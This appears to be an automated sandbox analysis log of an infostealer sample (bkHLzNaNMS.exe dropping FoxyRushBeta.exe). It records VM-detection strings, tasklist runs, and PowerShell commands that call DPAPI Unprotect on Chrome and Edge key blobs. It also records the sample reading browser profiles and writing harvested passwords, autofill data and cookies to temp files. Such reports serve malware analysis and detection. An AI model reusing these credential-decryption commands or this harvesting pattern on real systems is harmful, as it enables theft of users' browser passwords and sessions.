Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe File Volume queried: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapi
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources
Source: C:\Users\user\Desktop\bkHLzNaNMS.exe File opened: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\locales
Source: libGLESv2.dll.0.dr Binary or memory string: VMware
Source: bkHLzNaNMS.exe, 00000000.00000003.2191600867.0000000000869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:22
Source: bkHLzNaNMS.exe, 00000000.00000003.2191223251.0000000000869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: bkHLzNaNMS.exe, 00000000.00000003.2191284442.0000000000869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: bkHLzNaNMS.exe, 00000000.00000003.2191223251.0000000000869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: libGLESv2.dll.0.dr Binary or memory string: ZAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareVirtIOTest
Source: bkHLzNaNMS.exe, 00000000.00000003.2191284442.0000000000869000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist"
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1908,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1900 /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')"
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')"
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Process created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\FoxyRushBeta" --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --field-trial-handle=2528,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2524 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --field-trial-handle=2524,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=2520 /prefetch:3
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe "c:\users\user\appdata\local\temp\2txrqpqyxmap3e00ppro83zjr7q\foxyrushbeta.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=32069 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\foxyrushbeta" --gpu-preferences=uaaaaaaaaadoaaaeaaaaaaaaaaaaaaaaaabgaaeaaaaaaaaaaaaaaaaaaabcaaaaaaaaaaaaaaaaaaaaaaaaabaaaaaaaaaaeaaaaaaaaaaiaaaaaaaaaagaaaaaaaaa --field-trial-handle=2644,i,1504465930611205923,3791245271316318440,262144 --disable-features=sparerendererforsiteperprocess,windelayspellcheckserviceinit,winretrievesuggestionsonlyondemand --variations-seed-version --mojo-platform-channel-handle=1296 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Cookies\Google_Default.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Autofill\Autofills.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\Passwords\Passwords.txt VolumeInformation
